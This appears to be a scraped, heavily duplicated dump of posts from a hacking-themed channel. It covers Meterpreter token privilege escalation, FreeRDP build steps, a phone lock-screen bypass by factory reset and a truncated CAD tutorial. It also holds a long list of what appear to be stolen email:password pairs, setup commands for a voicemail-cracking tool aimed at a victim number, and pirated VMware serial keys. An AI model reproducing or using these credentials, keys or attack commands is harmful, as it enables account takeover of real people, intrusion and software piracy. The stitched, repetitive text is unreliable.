β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why We Use Elevation of Privilege ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Elevation of privilege is to increase the lowest privilege of a user to the highest. Often, the users we gain access to may have the lowest permissions.
> However, if you want to perform a penetration attack, you may need the administrator account permissions, so you need to upgrade the permissions. Privilege escalation can be achieved through the use of counterfeit tokens, local privilege escalation, and social engineering. This chapter introduces various methods to elevate user rights.
π¦Uses is
> Use of fake tokens;
> Local privilege elevation attack;
> Use of the Social Engineering Toolkit (SET);
> Attack using SET.
π¦Example Use of fake tokens :
1) Using fake tokens can impersonate another user in a network for various operations, such as elevating user rights, creating users and groups, and so on.
2) The token includes security information for the login session, such as user identification, user group, and user permissions.
3) When a user logs on to a Windows system, it is given an access token as part of its authentication session.
> For example, an intrusive user may need to perform a specific task as a domain administrator, and when it uses the token, it can impersonate the domain administrator to work. When it finishes processing the task, it usually discards the token permission
4) In this way, the intruder will use this weakness to elevate its access rights. This section will introduce the implementation of counterfeit token attacks under Meterpreter Shell.
and many,any such examples will send later on UndercOde
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why We Use Elevation of Privilege ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Elevation of privilege is to increase the lowest privilege of a user to the highest. Often, the users we gain access to may have the lowest permissions.
> However, if you want to perform a penetration attack, you may need the administrator account permissions, so you need to upgrade the permissions. Privilege escalation can be achieved through the use of counterfeit tokens, local privilege escalation, and social engineering. This chapter introduces various methods to elevate user rights.
π¦Uses is
> Use of fake tokens;
> Local privilege elevation attack;
> Use of the Social Engineering Toolkit (SET);
> Attack using SET.
π¦Example Use of fake tokens :
1) Using fake tokens can impersonate another user in a network for various operations, such as elevating user rights, creating users and groups, and so on.
2) The token includes security information for the login session, such as user identification, user group, and user permissions.
3) When a user logs on to a Windows system, it is given an access token as part of its authentication session.
> For example, an intrusive user may need to perform a specific task as a domain administrator, and when it uses the token, it can impersonate the domain administrator to work. When it finishes processing the task, it usually discards the token permission
4) In this way, the intruder will use this weakness to elevate its access rights. This section will introduce the implementation of counterfeit token attacks under Meterpreter Shell.
and many,any such examples will send later on UndercOde
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FreeRDP is a free remote desktop protocol library and clients 2020 updated
>FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Enjoy the freedom of using your software wherever you want, the way you want it, in a world where interoperability can finally liberate your computing experience.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1> official release :
> https://pub.freerdp.com/releases/
2> extract tar -zxvf namefile.tar.gz
3> ./configure
4> make
5> sudo make install
π¦Streaming the Virtual Desktop:
With H.264 desktop streaming, introduced in RDP 10, we now also have new possibilities to transfer the desktop content to the user. We have developed a special load-balancing algorithm that adjusts image quality during streaming, based on current network characteristics. FreeRDPβs network characteristics detection (which is part of the RDP core specification) provides us with all the necessary information about the connectionβs latency and bandwidth. Depending on these parameters we dynamically increase or decrease the quality level of the H.264 encoder. An implementation of the software H.264 encoder backend, using OpenH264, is also part of the FreeRDP library.
π¦ Performance matters:
> As explained earlier, Thincast Workstation provides virtual graphics hardware to the guest that exposes full Direct3D11 support. This means all graphical operations in the guest OS are handled and accelerated by the host GPU. As we want to achieve the best performance possible, it would be a pity to do the H.264 encoding of our virtual desktop in software. Luckily, thanks to FreeRDPβs modular architecture, we were able to plug-in our own hardware encoders and completely offload this work from the CPU. Because every vendor has its own multimedia framework we implemented encoders for all major GPU producers including NVidia, AMD and Intel.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FreeRDP is a free remote desktop protocol library and clients 2020 updated
>FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Enjoy the freedom of using your software wherever you want, the way you want it, in a world where interoperability can finally liberate your computing experience.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1> official release :
> https://pub.freerdp.com/releases/
2> extract tar -zxvf namefile.tar.gz
3> ./configure
4> make
5> sudo make install
π¦Streaming the Virtual Desktop:
With H.264 desktop streaming, introduced in RDP 10, we now also have new possibilities to transfer the desktop content to the user. We have developed a special load-balancing algorithm that adjusts image quality during streaming, based on current network characteristics. FreeRDPβs network characteristics detection (which is part of the RDP core specification) provides us with all the necessary information about the connectionβs latency and bandwidth. Depending on these parameters we dynamically increase or decrease the quality level of the H.264 encoder. An implementation of the software H.264 encoder backend, using OpenH264, is also part of the FreeRDP library.
π¦ Performance matters:
> As explained earlier, Thincast Workstation provides virtual graphics hardware to the guest that exposes full Direct3D11 support. This means all graphical operations in the guest OS are handled and accelerated by the host GPU. As we want to achieve the best performance possible, it would be a pity to do the H.264 encoding of our virtual desktop in software. Luckily, thanks to FreeRDPβs modular architecture, we were able to plug-in our own hardware encoders and completely offload this work from the CPU. Because every vendor has its own multimedia framework we implemented encoders for all major GPU producers including NVidia, AMD and Intel.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
dpham14@hotmail.com:Iloveudina1 | Expiration = 2019-12-16 13:39:18
hide0324@gmail.com:chinpira0324 | Expiration = 2020-04-21 15:48:10
Kungii0@gmail.com:Hussain123 | Expiration = 2019-11-16 13:51:34
chandarachun@gmail.com:triggahaw1 | Expiration = 2019-09-19 00:47:39
Tylerv667767@gmail.com:That1day2 | Expiration = 2019-12-26 03:53:30
xbones123@hotmail.com:nikolai55 | Expiration = 2019-10-13 09:22:17
razielphisher@gmail.com:Lancas7er | Expiration = 2021-05-28 16:37:13
snakus_raph@hotmail.com:Jurras2c | Expiration = 2021-12-24 13:43:31
dawson.coyle@ccvineland.org:frog1111 | Expiration = 2020-08-29 01:38:58
jester83198@gmail.com:Defender1 | Expiration = 2022-10-05 22:30:23
gibbsharry@hotmail.com:fourteen14 | Expiration = 2022-05-28 11:18:48
sitrikerak@gmail.com:chaosknighta | Expiration = 2019-09-21 10:38:34
andrewcoxfilm@hotmail.com:thehoho1 | Expiration = 2021-01-18 12:44:32
cazer99@gmail.com:Edward99 | Expiration = 2020-05-05 19:00:36
Henry066@hotmail.fr:Henry660 | Expiration = 2022-07-12 15:21:44
patrick_98@live.de:Patrick98 | Expiration = 2022-07-20 16:11:50
jonathan.tarith@gmail.com:Germania4405 | Expiration = 2022-08-08 14:38:16
bcleahy@gmail.com:brendan2 | Expiration = 2019-10-13 21:22:14
philippdeurer@icloud.com:Fcbayern13 | Expiration = 2022-04-25 02:50:44
delaunayalexandre18@gmail.com:Alexandre9 | Expiration = 2019-10-19 10:06:47
toriol64@gmail.com:tato6446 | Expiration = 2020-05-11 18:00:09
joelstav82@gmail.com:Joelstav1 | Expiration = 2020-05-15 07:11:12
deathmachine4888@gmail.com:Fartfart1 | Expiration = 2022-01-30 00:08:24
joel_chong84@hotmail.com:s9427833c | Expiration = 2019-10-01 18:27:04
Andersson.gustav@hotmail.com:Kattmat22 | Expiration = 2022-05-18 07:02:39
alisaydam46@hotmail.com:saydam46 | Expiration = 2020-05-01 09:33:21
kylef97@hotmail.co.uk:william22 | Expiration = 2021-04-19 08:41:15
qualm17@aol.com:Onimusha1 | Expiration = 2022-08-27 21:25:55
blue.kry@gmail.com:Stabilo1 | Expiration = 2022-05-13 18:03:13
Eirik.Aanstad@gmail.com:Kjf9w9er | Expiration = 2019-09-29 07:05:04
aman-parmar25@hotmail.com:Likeaboss1 | Expiration = 2022-02-24 10:37:06
hamed.mohamed.pro@gmail.com:Momox93120 | Expiration = 2022-01-08 02:08:52
eeva.valtokari@hotmail.com:Kiriquu1 | Expiration = 2019-09-27 20:24:08
gtonsei101@gmail.com:angelwing7 | Expiration = 2020-06-14 21:45:47
randysesariojr@gmail.com:ninja3221 | Expiration = 2020-08-02 13:59:15
pinkyshaffer@gmail.com:homer333 | Expiration = 2020-06-01 00:00:00
jenjenfear2@gmail.com:Pinkpink22 | Expiration = 2022-01-05 12:01:03
auglvig@msn.com:Viviogdan1 | Expiration = 2019-10-13 20:43:39
gaving@talktalk.net:trybe1745 | Expiration = 2022-03-16 12:08:18
dl_blr@hotmail.com:kimecW35 | Expiration = 2022-09-12 17:09:36
one4daniel@gmail.com:anthony33 | Expiration = 2019-09-29 20:50:11
reparaudio@laposte.net:michto288 | Expiration = 2020-04-09 14:18:05
phelo70@ntlworld.com:f2sidecars | Expiration = 2020-09-10 20:06:43
nschwitters@yahoo.com:nickrs11 | Expiration = 2022-06-03 13:20:44
liamodwyer85@gmail.com:kilteely619 | Expiration = 2021-11-01 19:40:33
mrecord25@gmail.com:Mcgwire25 | Expiration = 2020-06-06 22:24:39
marslevandreas@gmail.com:Gvd78mns1 | Expiration = 2022-06-15 12:47:36
dbrown1991@comcast.net:Ferrium2010 | Expiration = 2020-07-23 22:15:34
naif.s.k@msn.com:naif409409409 | Expiration = 2020-06-27 22:55:20
jakob.vestbjerg@hotmail.dk:Jalle123 | Expiration = 2022-07-10 12:27:17
milind892002@gmail.com:m3030351 | Expiration = 2022-05-21 03:01:01
anthony.n.1989@gmail.com:vegeta67 | Expiration = 2022-04-21 23:52:05
thanatoshan@gmail.com:wocaonima123 | Expiration = 2020-06-07 12:05:20
shaomengda@hotmail.com:123456qQ | Expiration = 2022-03-13 17:42:52
mathew.dimmock@gmail.com:Splatman18 | Expiration = 2020-06-08 06:30:50
mike@bommaritodesign.com:Sweatb22 | Expiration = 2021-11-16 02:55:03
quentonh234@gmail.com:Wordbla6 | Expiration = 2022-06-18 23:38:36
philyew@live.com:deion211 | Expiration = 2021-02-20 23:46:04
reverendphu@gmail.com:Phugod123 | Expiration = 2019-09-18 22:48:36
hide0324@gmail.com:chinpira0324 | Expiration = 2020-04-21 15:48:10
Kungii0@gmail.com:Hussain123 | Expiration = 2019-11-16 13:51:34
chandarachun@gmail.com:triggahaw1 | Expiration = 2019-09-19 00:47:39
Tylerv667767@gmail.com:That1day2 | Expiration = 2019-12-26 03:53:30
xbones123@hotmail.com:nikolai55 | Expiration = 2019-10-13 09:22:17
razielphisher@gmail.com:Lancas7er | Expiration = 2021-05-28 16:37:13
snakus_raph@hotmail.com:Jurras2c | Expiration = 2021-12-24 13:43:31
dawson.coyle@ccvineland.org:frog1111 | Expiration = 2020-08-29 01:38:58
jester83198@gmail.com:Defender1 | Expiration = 2022-10-05 22:30:23
gibbsharry@hotmail.com:fourteen14 | Expiration = 2022-05-28 11:18:48
sitrikerak@gmail.com:chaosknighta | Expiration = 2019-09-21 10:38:34
andrewcoxfilm@hotmail.com:thehoho1 | Expiration = 2021-01-18 12:44:32
cazer99@gmail.com:Edward99 | Expiration = 2020-05-05 19:00:36
Henry066@hotmail.fr:Henry660 | Expiration = 2022-07-12 15:21:44
patrick_98@live.de:Patrick98 | Expiration = 2022-07-20 16:11:50
jonathan.tarith@gmail.com:Germania4405 | Expiration = 2022-08-08 14:38:16
bcleahy@gmail.com:brendan2 | Expiration = 2019-10-13 21:22:14
philippdeurer@icloud.com:Fcbayern13 | Expiration = 2022-04-25 02:50:44
delaunayalexandre18@gmail.com:Alexandre9 | Expiration = 2019-10-19 10:06:47
toriol64@gmail.com:tato6446 | Expiration = 2020-05-11 18:00:09
joelstav82@gmail.com:Joelstav1 | Expiration = 2020-05-15 07:11:12
deathmachine4888@gmail.com:Fartfart1 | Expiration = 2022-01-30 00:08:24
joel_chong84@hotmail.com:s9427833c | Expiration = 2019-10-01 18:27:04
Andersson.gustav@hotmail.com:Kattmat22 | Expiration = 2022-05-18 07:02:39
alisaydam46@hotmail.com:saydam46 | Expiration = 2020-05-01 09:33:21
kylef97@hotmail.co.uk:william22 | Expiration = 2021-04-19 08:41:15
qualm17@aol.com:Onimusha1 | Expiration = 2022-08-27 21:25:55
blue.kry@gmail.com:Stabilo1 | Expiration = 2022-05-13 18:03:13
Eirik.Aanstad@gmail.com:Kjf9w9er | Expiration = 2019-09-29 07:05:04
aman-parmar25@hotmail.com:Likeaboss1 | Expiration = 2022-02-24 10:37:06
hamed.mohamed.pro@gmail.com:Momox93120 | Expiration = 2022-01-08 02:08:52
eeva.valtokari@hotmail.com:Kiriquu1 | Expiration = 2019-09-27 20:24:08
gtonsei101@gmail.com:angelwing7 | Expiration = 2020-06-14 21:45:47
randysesariojr@gmail.com:ninja3221 | Expiration = 2020-08-02 13:59:15
pinkyshaffer@gmail.com:homer333 | Expiration = 2020-06-01 00:00:00
jenjenfear2@gmail.com:Pinkpink22 | Expiration = 2022-01-05 12:01:03
auglvig@msn.com:Viviogdan1 | Expiration = 2019-10-13 20:43:39
gaving@talktalk.net:trybe1745 | Expiration = 2022-03-16 12:08:18
dl_blr@hotmail.com:kimecW35 | Expiration = 2022-09-12 17:09:36
one4daniel@gmail.com:anthony33 | Expiration = 2019-09-29 20:50:11
reparaudio@laposte.net:michto288 | Expiration = 2020-04-09 14:18:05
phelo70@ntlworld.com:f2sidecars | Expiration = 2020-09-10 20:06:43
nschwitters@yahoo.com:nickrs11 | Expiration = 2022-06-03 13:20:44
liamodwyer85@gmail.com:kilteely619 | Expiration = 2021-11-01 19:40:33
mrecord25@gmail.com:Mcgwire25 | Expiration = 2020-06-06 22:24:39
marslevandreas@gmail.com:Gvd78mns1 | Expiration = 2022-06-15 12:47:36
dbrown1991@comcast.net:Ferrium2010 | Expiration = 2020-07-23 22:15:34
naif.s.k@msn.com:naif409409409 | Expiration = 2020-06-27 22:55:20
jakob.vestbjerg@hotmail.dk:Jalle123 | Expiration = 2022-07-10 12:27:17
milind892002@gmail.com:m3030351 | Expiration = 2022-05-21 03:01:01
anthony.n.1989@gmail.com:vegeta67 | Expiration = 2022-04-21 23:52:05
thanatoshan@gmail.com:wocaonima123 | Expiration = 2020-06-07 12:05:20
shaomengda@hotmail.com:123456qQ | Expiration = 2022-03-13 17:42:52
mathew.dimmock@gmail.com:Splatman18 | Expiration = 2020-06-08 06:30:50
mike@bommaritodesign.com:Sweatb22 | Expiration = 2021-11-16 02:55:03
quentonh234@gmail.com:Wordbla6 | Expiration = 2022-06-18 23:38:36
philyew@live.com:deion211 | Expiration = 2021-02-20 23:46:04
reverendphu@gmail.com:Phugod123 | Expiration = 2019-09-18 22:48:36
rosswinter1986@gmail.com:Hobbit14 | Expiration = 2019-10-02 20:47:11
jourdahndavid@gmail.com:arya118251 | Expiration = 2019-09-29 15:42:48
hodge45@gmail.com:Chewbacca45 | Expiration = 2022-08-09 00:31:07
crow.stephen@gmail.com:savior11 | Expiration = 2020-08-08 04:05:16
ransley77@gmail.com:dingo101 | Expiration = 2020-01-30 13:20:37
tsherman219@gmail.com:tristan123 | Expiration = 2022-02-03 17:46:39
jaredgrant101@gmail.com:Alexander123 | Expiration = 2020-04-21 22:43:48
sbarr531@gmail.com:99Basketball | Expiration = 2021-03-12 16:58:25
starjosie777@gmail.com:Kitty101 | Expiration = 2021-05-25 14:49:38
herregud1989@outlook.com:Pellekanin1 | Expiration = 2019-09-30 04:25:16
rjeff24@gmail.com:Password90 | Expiration = 2022-04-30 18:14:06
troynickerson@gmail.com:FuckTh1s | Expiration = 2022-06-26 02:42:51
jft.jenkins@gmail.com:07091998Jft | Expiration = 2019-11-09 00:55:57
jcrouch764@gmail.com:thunder3 | Expiration = 2020-08-14 00:03:17
noodlejon@yahoo.com:Balto1925 | Expiration = 2019-11-23 02:35:37
benz_47@hotmail.com:1qaz@WSX | Expiration = 2020-07-08 01:09:16
nico.grusse@gmail.com:Tgdobyboloss94! | Expiration = 2022-09-09 13:38:12
deperetti7@hotmail.com:sagi7dec | Expiration = 2020-10-07 17:26:30
wesleywesdude@gmail.com:wddude123 | Expiration = 2019-09-21 21:06:37
alawoeu@yahoo.fr:ua250555 | Expiration = 2020-01-14 06:16:33
danielblier@gmail.com:Dblier454 | Expiration = 2020-08-18 17:45:04
qy120838@126.com:qyxx58LBH | Expiration = 2019-10-02 13:24:25
jeroen.verberck@gmail.com:Voetballen10 | Expiration = 2022-06-08 20:46:42
ethanmsalisbury@gmail.com:Bleach12 | Expiration = 2020-05-22 12:29:18
radeck.le.panda.roux@gmail.com:Meteora23 | Expiration = 2022-05-07 12:36:13
paulenas605@gmail.com:Saulenas21 | Expiration = 2019-10-03 17:59:52
maxikangs@gmail.com:khamul33 | Expiration = 2020-08-26 12:49:49
gazmo1969@hotmail.com:southampton | Expiration = 2021-11-25 19:24:54
javallone11@gmail.com:holly123 | Expiration = 2020-04-29 18:37:52
masonice@gmail.com:whocares | Expiration = 2019-12-24 03:55:57
leadbyexample519@gmail.com:jeremiah2911 | Expiration = 2020-01-24 03:54:23
gregoryafay@gmail.com:web1530 | Expiration = 2020-01-25 00:00:00
michael.luben@gmail.com:Amethyst0 | Expiration = 2022-11-04 12:58:20
deneire84@gmail.com:july1984 | Expiration = 2024-11-01 00:22:42
patrickkleroy@gmail.com:arcs1800 | Expiration = 2020-05-09 16:31:14
rocco.reichelt@gmail.com:Superman1999 | Expiration = 2022-03-10 18:18:48
seanfrost1996@gmail.com:medusa1415 | Expiration = 2020-07-28 18:09:32
nick.yuan@gmail.com:Ny817124 | Expiration = 2020-04-01 23:14:32
borisgr.od@gmail.com:7336406s | Expiration = 2019-09-21 19:46:58
georgewrestler@yahoo.com:pedrolopez1 | Expiration = 2020-01-18 00:00:00
mariana.savage@gmail.com:harthill | Expiration = 2022-03-06 00:32:56
higsqb7@gmail.com:Maxwell07 | Expiration = 2020-02-05 23:25:14
conmaninhawaii@gmail.com:cloudstrife7 | Expiration = 2022-01-28 00:42:04
jourdahndavid@gmail.com:arya118251 | Expiration = 2019-09-29 15:42:48
hodge45@gmail.com:Chewbacca45 | Expiration = 2022-08-09 00:31:07
crow.stephen@gmail.com:savior11 | Expiration = 2020-08-08 04:05:16
ransley77@gmail.com:dingo101 | Expiration = 2020-01-30 13:20:37
tsherman219@gmail.com:tristan123 | Expiration = 2022-02-03 17:46:39
jaredgrant101@gmail.com:Alexander123 | Expiration = 2020-04-21 22:43:48
sbarr531@gmail.com:99Basketball | Expiration = 2021-03-12 16:58:25
starjosie777@gmail.com:Kitty101 | Expiration = 2021-05-25 14:49:38
herregud1989@outlook.com:Pellekanin1 | Expiration = 2019-09-30 04:25:16
rjeff24@gmail.com:Password90 | Expiration = 2022-04-30 18:14:06
troynickerson@gmail.com:FuckTh1s | Expiration = 2022-06-26 02:42:51
jft.jenkins@gmail.com:07091998Jft | Expiration = 2019-11-09 00:55:57
jcrouch764@gmail.com:thunder3 | Expiration = 2020-08-14 00:03:17
noodlejon@yahoo.com:Balto1925 | Expiration = 2019-11-23 02:35:37
benz_47@hotmail.com:1qaz@WSX | Expiration = 2020-07-08 01:09:16
nico.grusse@gmail.com:Tgdobyboloss94! | Expiration = 2022-09-09 13:38:12
deperetti7@hotmail.com:sagi7dec | Expiration = 2020-10-07 17:26:30
wesleywesdude@gmail.com:wddude123 | Expiration = 2019-09-21 21:06:37
alawoeu@yahoo.fr:ua250555 | Expiration = 2020-01-14 06:16:33
danielblier@gmail.com:Dblier454 | Expiration = 2020-08-18 17:45:04
qy120838@126.com:qyxx58LBH | Expiration = 2019-10-02 13:24:25
jeroen.verberck@gmail.com:Voetballen10 | Expiration = 2022-06-08 20:46:42
ethanmsalisbury@gmail.com:Bleach12 | Expiration = 2020-05-22 12:29:18
radeck.le.panda.roux@gmail.com:Meteora23 | Expiration = 2022-05-07 12:36:13
paulenas605@gmail.com:Saulenas21 | Expiration = 2019-10-03 17:59:52
maxikangs@gmail.com:khamul33 | Expiration = 2020-08-26 12:49:49
gazmo1969@hotmail.com:southampton | Expiration = 2021-11-25 19:24:54
javallone11@gmail.com:holly123 | Expiration = 2020-04-29 18:37:52
masonice@gmail.com:whocares | Expiration = 2019-12-24 03:55:57
leadbyexample519@gmail.com:jeremiah2911 | Expiration = 2020-01-24 03:54:23
gregoryafay@gmail.com:web1530 | Expiration = 2020-01-25 00:00:00
michael.luben@gmail.com:Amethyst0 | Expiration = 2022-11-04 12:58:20
deneire84@gmail.com:july1984 | Expiration = 2024-11-01 00:22:42
patrickkleroy@gmail.com:arcs1800 | Expiration = 2020-05-09 16:31:14
rocco.reichelt@gmail.com:Superman1999 | Expiration = 2022-03-10 18:18:48
seanfrost1996@gmail.com:medusa1415 | Expiration = 2020-07-28 18:09:32
nick.yuan@gmail.com:Ny817124 | Expiration = 2020-04-01 23:14:32
borisgr.od@gmail.com:7336406s | Expiration = 2019-09-21 19:46:58
georgewrestler@yahoo.com:pedrolopez1 | Expiration = 2020-01-18 00:00:00
mariana.savage@gmail.com:harthill | Expiration = 2022-03-06 00:32:56
higsqb7@gmail.com:Maxwell07 | Expiration = 2020-02-05 23:25:14
conmaninhawaii@gmail.com:cloudstrife7 | Expiration = 2022-01-28 00:42:04
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
